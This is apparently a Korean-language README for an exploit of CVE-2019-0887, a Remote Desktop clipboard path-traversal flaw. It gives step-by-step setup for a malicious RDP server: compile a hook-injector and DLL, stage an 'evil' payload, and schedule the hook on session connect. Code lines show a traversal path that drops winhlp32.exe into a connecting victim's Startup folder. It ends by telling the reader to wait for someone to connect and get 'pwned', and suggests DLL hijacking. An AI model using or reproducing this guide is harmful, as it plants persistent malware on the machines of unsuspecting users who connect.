
CVE-2019-0887용 exp
CVE-2019-0887을 컴파일하고 winhlp.dll로 이름을 변경하세요.
Install_Hook를 컴파일하고 hook.exe로 이름을 변경하세요.
주의: x64로 컴파일해야 합니다.
그것들을 악성 시스템에 다음과 같이 넣으세요.
c:\windows\hook.exe
c:\windows\winhlp.dll
c:\windows\winhlp64.exe # something evil
경로를 변경하려면, 다음 부분을 수정하세요.
# CVE-2019-0887/dllmain.cpp
WCHAR evalfile[] = { L"C:\\windows\\winhlp64.exe" };
WCHAR efile[] = { L"C:\\windows\\system32\\..\\..\\..\\..\\..\\../AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/winhlp32.exe" };
# Install_Hook/ConsoleApplication.cpp
LoadDll(pid, "C:\\Windows\\winhlp.dll");
taskschd.msc를 사용하여 작업 계획을 만들고, 트리거를 '사용자 세션 연결 시'로 설정한 후 hook.exe의 파일 경로를 설정하세요.
누군가 내 악성 시스템에 연결하여 무언가를 복사하고, pwn될 때까지 기다리세요.
팁: DLL 하이재킹을 사용하는 건 어떨까요?